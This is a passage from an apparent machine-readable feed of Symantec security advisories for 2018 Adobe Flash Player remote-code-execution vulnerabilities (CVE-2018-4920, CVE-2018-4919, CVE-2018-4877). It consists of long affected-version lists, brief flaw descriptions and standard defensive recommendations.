16.0.0.296 \n * Adobe Flash Player 16.0.0.305 \n * Adobe Flash Player 17.0.0.134 \n * Adobe Flash Player 17.0.0.169 \n * Adobe Flash Player 17.0.0.188 \n * Adobe Flash Player 18.0.0.143 \n * Adobe Flash Player 18.0.0.160 \n * Adobe Flash Player 18.0.0.161 \n * Adobe Flash Player 18.0.0.194 \n * Adobe Flash Player 18.0.0.203 \n * Adobe Flash Player 18.0.0.204 \n * Adobe Flash Player 18.0.0.209 \n * Adobe Flash Player 18.0.0.232 \n * Adobe Flash Player 18.0.0.233 \n * Adobe Flash Player 18.0.0.241 \n * Adobe Flash Player 18.0.0.252 \n * Adobe Flash Player 18.0.0.255 \n * Adobe Flash Player 18.0.0.261 \n * Adobe Flash Player 18.0.0.268 \n * Adobe Flash Player 18.0.0.324 \n * Adobe Flash Player 18.0.0.326 \n * Adobe Flash Player 18.0.0.329 \n * Adobe Flash Player 18.0.0.333 \n * Adobe Flash Player 18.0.0.343 \n * Adobe Flash Player 18.0.0.352 \n * Adobe Flash Player 18.0.0.360 \n * Adobe Flash Player 18.0.0.366 \n * Adobe Flash Player 18.0.0.375 \n * Adobe Flash Player 18.0.0.382 \n * Adobe Flash Player 19.0.0.185 \n * Adobe Flash Player 19.0.0.207 \n * Adobe Flash Player 19.0.0.226 \n * Adobe Flash Player 19.0.0.245 \n * Adobe Flash Player 2 \n * Adobe Flash Player 20.0.0.228 \n * Adobe Flash Player 20.0.0.235 \n * Adobe Flash Player 20.0.0.267 \n * Adobe Flash Player 20.0.0.272 \n * Adobe Flash Player 20.0.0.286 \n * Adobe Flash Player 20.0.0.306 \n * Adobe Flash Player 21.0 \n * Adobe Flash Player 21.0.0.182 \n * Adobe Flash Player 21.0.0.197 \n * Adobe Flash Player 21.0.0.213 \n * Adobe Flash Player 21.0.0.216 \n * Adobe Flash Player 21.0.0.226 \n * Adobe Flash Player 21.0.0.241 \n * Adobe Flash Player 21.0.0.242 \n * Adobe Flash Player 22.0.0.192 \n * Adobe Flash Player 22.0.0.209 \n * Adobe Flash Player 22.0.0.211 \n * Adobe Flash Player 23.0.0.162 \n * Adobe Flash Player 23.0.0.185 \n * Adobe Flash Player 23.0.0.205 \n * Adobe Flash Player 23.0.0.207 \n * Adobe Flash Player 24.0.0.186 \n * Adobe Flash Player 24.0.0.194 \n * Adobe Flash Player 24.0.0.221 \n * Adobe Flash Player 25.0.0.127 \n * Adobe Flash Player 25.0.0.148 \n * Adobe Flash Player 25.0.0.163 \n * Adobe Flash Player 25.0.0.171 \n * Adobe Flash Player 26.0.0.120 \n * Adobe Flash Player 26.0.0.126 \n * Adobe Flash Player 26.0.0.131 \n * Adobe Flash Player 26.0.0.137 \n * Adobe Flash Player 26.0.0.151 \n * Adobe Flash Player 27.0.0.130 \n * Adobe Flash Player 27.0.0.159 \n * Adobe Flash Player 27.0.0.170 \n * Adobe Flash Player 27.0.0.187 \n * Adobe Flash Player 28.0.0.126 \n * Adobe Flash Player 28.0.0.137 \n * Adobe Flash Player 28.0.0.161 \n * Adobe Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 7.61 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Microsoft Edge \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-03-13T00:00:00", "published": "2018-03-13T00:00:00", "id": "SMNTC-103383", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/103383", "type": "symantec", "title": "Adobe Flash Player CVE-2018-4920 Type Confusion Remote Code Execution Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-21T00:02:43", "bulletinFamily": "software", "cvelist": ["CVE-2018-4919"], "description": "### Description\n\nAdobe Flash Player is prone to an unspecified remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Successful exploitation could potentially allow an attacker to take control of the affected system. Adobe Flash Player version 28.0.0.161 and prior versions are vulnerable.\n\n### Technologies Affected\n\n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.18 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.228 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash Player 11.2.202.406 \n * Adobe Flash Player 11.2.202.411 \n * Adobe Flash Player 11.2.202.418 \n * Adobe Flash Player 11.2.202.424 \n * Adobe Flash Player 11.2.202.425 \n * Adobe Flash Player 11.2.202.429 \n * Adobe Flash Player 11.2.202.438 \n * Adobe Flash Player 11.2.202.440 \n * Adobe Flash Player 11.2.202.442 \n * Adobe Flash Player 11.2.202.451 \n * Adobe Flash Player 11.2.202.457 \n * Adobe Flash Player 11.2.202.460 \n * Adobe Flash Player 11.2.202.466 \n * Adobe Flash Player 11.2.202.468 \n * Adobe Flash Player 11.2.202.481 \n * Adobe Flash Player 11.2.202.491 \n * Adobe Flash Player 11.2.202.508 \n * Adobe Flash Player 11.2.202.521 \n * Adobe Flash Player 11.2.202.535 \n * Adobe Flash Player 11.2.202.540 \n * Adobe Flash Player 11.2.202.548 \n * Adobe Flash Player 11.2.202.554 \n * Adobe Flash Player 11.2.202.559 \n * Adobe Flash Player 11.2.202.569 \n * Adobe Flash Player 11.2.202.577 \n * Adobe Flash Player 11.2.202.616 \n * Adobe Flash Player 11.2.202.621 \n * Adobe Flash Player 11.2.202.626 \n * Adobe Flash Player 11.2.202.632 \n * Adobe Flash Player 11.2.202.635 \n * Adobe Flash Player 11.2.202.644 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.203 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.7.700.279 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 13.0.0.206 \n * Adobe Flash Player 13.0.0.214 \n * Adobe Flash Player 13.0.0.223 \n * Adobe Flash Player 13.0.0.231 \n * Adobe Flash Player 13.0.0.241 \n * Adobe Flash Player 13.0.0.244 \n * Adobe Flash Player 13.0.0.250 \n * Adobe Flash Player 13.0.0.252 \n * Adobe Flash Player 13.0.0.258 \n * Adobe Flash Player 13.0.0.259 \n * Adobe Flash Player 13.0.0.260 \n * Adobe Flash Player 13.0.0.262 \n * Adobe Flash Player 13.0.0.264 \n * Adobe Flash Player 13.0.0.269 \n * Adobe Flash Player 13.0.0.277 \n * Adobe Flash Player 13.0.0.281 \n * Adobe Flash Player 13.0.0.289 \n * Adobe Flash Player 13.0.0.292 \n * Adobe Flash Player 13.0.0.296 \n * Adobe Flash Player 13.0.0.302 \n * Adobe Flash Player 13.0.0.309 \n * Adobe Flash Player 14.0.0.125 \n * Adobe Flash Player 14.0.0.145 \n * Adobe Flash Player 14.0.0.176 \n * Adobe Flash Player 14.0.0.177 \n * Adobe Flash Player 14.0.0.179 \n * Adobe Flash Player 15.0.0.152 \n * Adobe Flash Player 15.0.0.189 \n * Adobe Flash Player 15.0.0.223 \n * Adobe Flash Player 15.0.0.239 \n * Adobe Flash Player 15.0.0.242 \n * Adobe Flash Player 15.0.0.246 \n * Adobe Flash Player 16.0.0.234 \n * Adobe Flash Player 16.0.0.235 \n * Adobe Flash Player 16.0.0.257 \n * Adobe Flash Player 16.0.0.287 \n * Adobe Flash Player 16.0.0.291 \n * Adobe Flash Player 16.0.0.296 \n * Adobe Flash Player 16.0.0.305 \n * Adobe Flash Player 17.0.0.134 \n * Adobe Flash Player 17.0.0.169 \n * Adobe Flash Player 17.0.0.188 \n * Adobe Flash Player 18.0.0.143 \n * Adobe Flash Player 18.0.0.160 \n * Adobe Flash Player 18.0.0.161 \n * Adobe Flash Player 18.0.0.194 \n * Adobe Flash Player 18.0.0.203 \n * Adobe Flash Player 18.0.0.204 \n * Adobe Flash Player 18.0.0.209 \n * Adobe Flash Player 18.0.0.232 \n * Adobe Flash Player 18.0.0.233 \n * Adobe Flash Player 18.0.0.241 \n * Adobe Flash Player 18.0.0.252 \n * Adobe Flash Player 18.0.0.255 \n * Adobe Flash Player 18.0.0.261 \n * Adobe Flash Player 18.0.0.268 \n * Adobe Flash Player 18.0.0.324 \n * Adobe Flash Player 18.0.0.326 \n * Adobe Flash Player 18.0.0.329 \n * Adobe Flash Player 18.0.0.333 \n * Adobe Flash Player 18.0.0.343 \n * Adobe Flash Player 18.0.0.352 \n * Adobe Flash Player 18.0.0.360 \n * Adobe Flash Player 18.0.0.366 \n * Adobe Flash Player 18.0.0.375 \n * Adobe Flash Player 19.0.0.185 \n * Adobe Flash Player 19.0.0.207 \n * Adobe Flash Player 19.0.0.226 \n * Adobe Flash Player 19.0.0.245 \n * Adobe Flash Player 2 \n * Adobe Flash Player 20.0.0.228 \n * Adobe Flash Player 20.0.0.235 \n * Adobe Flash Player 20.0.0.267 \n * Adobe Flash Player 20.0.0.272 \n * Adobe Flash Player 20.0.0.286 \n * Adobe Flash Player 20.0.0.306 \n * Adobe Flash Player 21.0 \n * Adobe Flash Player 21.0.0.182 \n * Adobe Flash Player 21.0.0.197 \n * Adobe Flash Player 21.0.0.213 \n * Adobe Flash Player 21.0.0.216 \n * Adobe Flash Player 21.0.0.226 \n * Adobe Flash Player 21.0.0.241 \n * Adobe Flash Player 21.0.0.242 \n * Adobe Flash Player 22.0.0.192 \n * Adobe Flash Player 23.0.0.162 \n * Adobe Flash Player 23.0.0.185 \n * Adobe Flash Player 23.0.0.205 \n * Adobe Flash Player 23.0.0.207 \n * Adobe Flash Player 24.0.0.186 \n * Adobe Flash Player 24.0.0.194 \n * Adobe Flash Player 24.0.0.221 \n * Adobe Flash Player 25.0.0.127 \n * Adobe Flash Player 25.0.0.148 \n * Adobe Flash Player 25.0.0.163 \n * Adobe Flash Player 25.0.0.171 \n * Adobe Flash Player 26.0.0.120 \n * Adobe Flash Player 26.0.0.126 \n * Adobe Flash Player 26.0.0.131 \n * Adobe Flash Player 26.0.0.137 \n * Adobe Flash Player 26.0.0.151 \n * Adobe Flash Player 27.0.0.130 \n * Adobe Flash Player 27.0.0.159 \n * Adobe Flash Player 27.0.0.170 \n * Adobe Flash Player 27.0.0.187 \n * Adobe Flash Player 28.0.0.126 \n * Adobe Flash Player 28.0.0.137 \n * Adobe Flash Player 28.0.0.161 \n * Adobe Flash Player 3 \n * Adobe Flash Player 4 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 7.61 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Google Chrome \n * Microsoft Edge \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-03-13T00:00:00", "published": "2018-03-13T00:00:00", "id": "SMNTC-103385", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/103385", "type": "symantec", "title": "Adobe Flash Player CVE-2018-4919 Use After Free Remote Code Execution Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-14T22:40:03", "bulletinFamily": "software", "cvelist": ["CVE-2018-4877"], "description": "### Description\n\nAdobe Flash Player is prone to an unspecified remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Successful exploitation could potentially allow an attacker to take control of the affected system. Adobe Flash Player version 28.0.0.137 and prior versions are vulnerable.\n\n### Technologies Affected\n\n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.18 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash 